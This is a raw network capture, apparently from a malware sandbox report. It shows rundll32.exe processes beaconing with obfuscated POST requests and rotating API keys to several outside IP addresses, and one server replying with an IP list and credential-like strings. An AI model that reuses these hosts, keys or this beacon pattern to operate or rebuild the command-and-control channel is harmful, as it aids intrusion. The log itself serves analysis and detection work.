    Jul 15, 2024 12:52:49.186743021 CEST294OUTPOST / HTTP/1.1
    Host: 91.142.74.28
    User-Agent: Go-http-client/1.1
    Content-Length: 158
    X-Api-Key: 3Xrnh7bV
    Accept-Encoding: gzip
    Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
    Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    48192.168.2.54976391.142.74.28801216C:\Windows\SysWOW64\rundll32.exe
    TimestampBytes transferredDirectionData
    Jul 15, 2024 12:52:50.108691931 CEST294OUTPOST / HTTP/1.1
    Host: 91.142.74.28
    User-Agent: Go-http-client/1.1
    Content-Length: 158
    X-Api-Key: ea4Tiyie
    Accept-Encoding: gzip
    Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
    Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    49192.168.2.54976477.238.224.56806580C:\Windows\SysWOW64\rundll32.exe
    TimestampBytes transferredDirectionData
    Jul 15, 2024 12:52:50.920933962 CEST295OUTPOST / HTTP/1.1
    Host: 77.238.224.56
    User-Agent: Go-http-client/1.1
    Content-Length: 158
    X-Api-Key: NGKv3Ksp
    Accept-Encoding: gzip
    Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
    Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    50192.168.2.54976577.238.224.56801216C:\Windows\SysWOW64\rundll32.exe
    TimestampBytes transferredDirectionData
    Jul 15, 2024 12:52:51.852854013 CEST295OUTPOST / HTTP/1.1
    Host: 77.238.224.56
    User-Agent: Go-http-client/1.1
    Content-Length: 158
    X-Api-Key: rX9IcSF1
    Accept-Encoding: gzip
    Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
    Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    51192.168.2.54976677.238.229.63806580C:\Windows\SysWOW64\rundll32.exe
    TimestampBytes transferredDirectionData
    Jul 15, 2024 12:52:52.571376085 CEST295OUTPOST / HTTP/1.1
    Host: 77.238.229.63
    User-Agent: Go-http-client/1.1
    Content-Length: 158
    X-Api-Key: GqPmqxNR
    Accept-Encoding: gzip
    Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
    Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    52192.168.2.54976777.238.229.63801216C:\Windows\SysWOW64\rundll32.exe
    TimestampBytes transferredDirectionData
    Jul 15, 2024 12:52:53.491560936 CEST295OUTPOST / HTTP/1.1
    Host: 77.238.229.63
    User-Agent: Go-http-client/1.1
    Content-Length: 158
    X-Api-Key: EgXclkc4
    Accept-Encoding: gzip
    Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
    Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    53192.168.2.54976877.238.250.123806580C:\Windows\SysWOW64\rundll32.exe
    TimestampBytes transferredDirectionData
    Jul 15, 2024 12:52:54.197122097 CEST296OUTPOST / HTTP/1.1
    Host: 77.238.250.123
    User-Agent: Go-http-client/1.1
    Content-Length: 158
    X-Api-Key: mXuQb0Xk
    Accept-Encoding: gzip
    Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
    Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
    Jul 15, 2024 12:52:55.587429047 CEST548INHTTP/1.1 200 OK
    Date: Mon, 15 Jul 2024 10:52:55 GMT
    Content-Length: 430
    Content-Type: text/plain; charset=utf-8
    Data Raw: 31 38 35 2e 32 33 31 2e 31 35 35 2e 32 33 34 3b 32 30 35 32 39 3b 68 41 30 56 74 73 4a 6a 74 31 6d 77 70 38 75 4b 3a 57 37 65 2f 50 30 6e 2f 30 79 54 31 46 41 4f 39 6d 53 30 35 68 58 31 2e 49 35 5a 32 38 33 34 2e 59 4a 4b 37 56 46 31 30 65 62 49 2e 46 55 4f 33 5a 47 75 38 46 77 5a 2c 47 32 58 68 33 36 4f 74 71 76 54 74 6d 4e 75 70 42 52 32 3a 46 55 44 2f 56 5a 55 2f 31 38 71 39 6b 69 64 31 57 6c 55 2e 44 6b 68 31 73 79 36 34 74 4e 65 32 4e 39 44 2e 6a 74 33 37 4e 59 74 34 36 54 63 2e 30 75 73 32 4c 37 6a 38 4d 34 6e 2c 66 63 34 68 35 58 45 74 4d 4a 42 74 58 72 4f 70 58 73 76 3a 31 74 4f 2f 50 30 48 2f 4f 66 61 37 6a 6d 57 37 62 55 77 2e 42 5a 32 32 45 49 51 33 6a 50 53 38 45 37 33 2e 32 77 37 32 47 54 55 32 54 59 62 34 4e 4a 42 2e 6a 71 52 35 6c 67 44 36 6b 58 35 2c 46 78 74 68 52 45 45 74 37 37 6b 74 35 6c 56 70 6a 6d 65 3a 7a 43 30 2f 6a 51 6a 2f 44 61 5a 37 4b 6e 69 37 4a 41 6a 2e 32 61 47 32 63 42 4e 33 32 41 50 38 70 6e 52 2e 4f 58 35 32 4d 72 62 32 72 58 6b 39 6d 6a 6d 2e 35 7a 59 36 62 78 57 [TRUNCATED]
    Data Ascii: 185.231.155.234;20529;hA0VtsJjt1mwp8uK:W7e/P0n/0yT1FAO9mS05hX1.I5Z2834.YJK7VF10ebI.FUO3ZGu8FwZ,G2Xh36OtqvTtmNupBR2:FUD/VZU/18q9kid1WlU.Dkh1sy64tNe2N9D.jt37NYt46Tc.0us2L7j8M4n,fc4h5XEtMJBtXrOpXsv:1tO/P0H/Ofa7jmW7bUw.BZ22EIQ3jPS8E73.2w72GTU2TYb4NJB.jqR5lgD6kX5,FxthREEt77kt5lVpjme:zC0/jQj/DaZ7Kni7JAj.2aG2cBN32AP8pnR.OX52Mrb2rXk9mjm.5zY6bxW3fx0,iyRhpIGtuidttiCpaby:2Jb/IFE/vyq79t57dYp.wLP23QM3Tlc8CSP.3zy2zjG535H0vwC.JtX1R8p2jn03uCR
    Jul 15, 2024 12:53:25.594650030 CEST6OUTData Raw: 00
    Data Ascii:
    Jul 15, 2024 12:53:55.603470087 CEST6OUTData Raw: 00
    Data Ascii:


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    54192.168.2.54976977.238.250.123801216C:\Windows\SysWOW64\rundll32.exe
    TimestampBytes transferredDirectionData
    Jul 15, 2024 12:52:55.114023924 CEST296OUTPOST / HTTP/1.1
    Host: 77.238.250.123
    User-Agent: Go-http-client/1.1
    Content-Length: 158
    X-Api-Key: 9PtS8V5T
    Accept-Encoding: gzip
    Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
    Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
    Jul 15, 2024 12:52:55.710138083 CEST183INHTTP/1.1 429 Too Many Requests
    Content-Type: text/plain; charset=utf-8
    X-Content-Type-Options: nosniff
    Date: Mon, 15 Jul 2024 10:52:55 GMT
    Content-Length: 18
    Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
    Data Ascii: Too many requests


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    55192.168.2.549771195.2.70.38806516C:\Windows\SysWOW64\rundll32.exe
    TimestampBytes transferredDirectionData
    Jul 15, 2024 12:52:56.283332109 CEST293OUTPOST / HTTP/1.1
    Host: 195.2.70.38
    User-Agent: Go-http-client/1.1
    Content-Length: 158
    X-Api-Key: NmInWh8x
    Accept-Encoding: gzip
    Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
    Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    56192.168.2.54977291.142.74.28806516C:\Windows\SysWOW64\rundll32.exe
    TimestampBytes transferredDirectionData
    Jul 15, 2024 12:52:58.038038015 CEST294OUTPOST / HTTP/1.1
    Host: 91.142.74.28
    User-Agent: Go-http-client/1.1
    Content-Length: 158
    X-Api-Key: Rw0gBNX8
    Accept-Encoding: gzip
    Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
    Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    57192.168.2.54977377.238.224.56806516C:\Windows\SysWOW64\rundll32.exe
    TimestampBytes transferredDirectionData
    Jul 15, 2024 12:52:59.764374018 CEST295OUTPOST / HTTP/1.1
    Host: 77.238.224.56
    User-Agent: Go-http-client/1.1
    Content-Length: 158
    X-Api-Key: 0lFI41j9
    Accept-Encoding: gzip
    Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
    Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    58192.168.2.54977477.238.229.63806516C:\Windows\SysWOW64\rundll32.exe
    TimestampBytes transferredDirectionData
    Jul 15, 2024 12:53:01.395051003 CEST295OUTPOST / HTTP/1.1
    Host: 77.238.229.63
    User-Agent: Go-http-client/1.1
    Content-Length: 158
    X-Api-Key: UxxjFR5w
    Accept-Encoding: gzip
    Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
    Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    59192.168.2.54977577.238.250.123806516C:\Windows\SysWOW64\rundll32.exe
    TimestampBytes transferredDirectionData
    Jul 15, 2024 12:53:03.051862955 CEST296OUTPOST / HTTP/1.1
    Host: 77.238.250.123
    User-Agent: Go-http-client/1.1
    Content-Length: 158
    X-Api-Key: 5X20ayYU
    Accept-Encoding: gzip
    Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
    Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
    Jul 15, 2024 12:53:03.645287991 CEST183INHTTP/1.1 429 Too Many Requests
    Content-Type: text/plain; charset=utf-8
    X-Content-Type-Options: nosniff
    Date: Mon, 15 Jul 2024 10:53:03 GMT
    Content-Length: 18
    Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
    Data Ascii: Too many requests


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    60192.168.2.549776195.2.70.38801216C:\Windows\SysWOW64\rundll32.exe
    TimestampBytes transferredDirectionData
    Jul 15, 2024 12:53:25.727612972 CEST293OUTPOST / HTTP/1.1
    Host: 195.2.70.38
    User-Agent: Go-http-client/1.1
    Content-Length: 158
    X-Api-Key: QnqsiWp8
    Accept-Encoding: gzip
    Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
    Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    61192.168.2.54977791.142.74.28801216C:\Windows\SysWOW64\rundll32.exe
    TimestampBytes transferredDirectionData
    Jul 15, 2024 12:53:27.489494085 CEST294OUTPOST / HTTP/1.1
    Host: 91.142.74.28
    User-Agent: Go-http-client/1.1
    Content-Length: 158
    X-Api-Key: 6Y2mFaMf
    Accept-Encoding: gzip
    Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
    Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    62192.168.2.54977877.238.224.56801216C:\Windows\SysWOW64\rundll32.exe
    TimestampBytes transferredDirectionData
    Jul 15, 2024 12:53:29.253784895 CEST295OUTPOST / HTTP/1.1
    Host: 77.238.224.56
    User-Agent: Go-http-client/1.1
    Content-Length: 158
    X-Api-Key: I0P0FS8J
    Accept-Encoding: gzip
    Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
    Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    63192.168.2.54977977.238.229.63801216C:\Windows\SysWOW64\rundll32.exe
    TimestampBytes transferredDirectionData
    Jul 15, 2024 12:53:30.883075953 CEST295OUTPOST / HTTP/1.1
    Host: 77.238.229.63
    User-Agent: Go-http-client/1.1
    Content-Length: 158
    X-Api-Key: PEnFMkLT
    Accept-Encoding: gzip
    Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
    Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    64192.168.2.54978077.238.250.123801216C:\Windows\SysWOW64\rundll32.exe
    TimestampBytes transferredDirectionData
    Jul 15, 2024 12:53:32.527395964 CEST296OUTPOST / HTTP/1.1
    Host: 77.238.250.123
    User-Agent: Go-http-client/1.1
    Content-Length: 158
    X-Api-Key: eUkNSG12
    Accept-Encoding: gzip
    Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
    Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
    Jul 15, 2024 12:53:33.143039942 CEST183INHTTP/1.1 429 Too Many Requests
    Content-Type: text/plain; charset=utf-8
    X-Content-Type-Options: nosniff
    Date: Mon, 15 Jul 2024 10:53:33 GMT
    Content-Length: 18
    Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
    Data Ascii: Too many requests


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    65192.168.2.549781195.2.70.38806516C:\Windows\SysWOW64\rundll32.exe
    TimestampBytes transferredDirectionData
    Jul 15, 2024 12:53:33.639770985 CEST293OUTPOST / HTTP/1.1
    Host: 195.2.70.38
    User-Agent: Go-http-client/1.1
    Content-Length: 158
    X-Api-Key: ZdIGkksg
    Accept-Encoding: gzip
    Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
    Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    66192.168.2.54978291.142.74.28806516C:\Windows\SysWOW64\rundll32.exe
    TimestampBytes transferredDirectionData
    Jul 15, 2024 12:53:35.398521900 CEST294OUTPOST / HTTP/1.1
    Host: 91.142.74.28
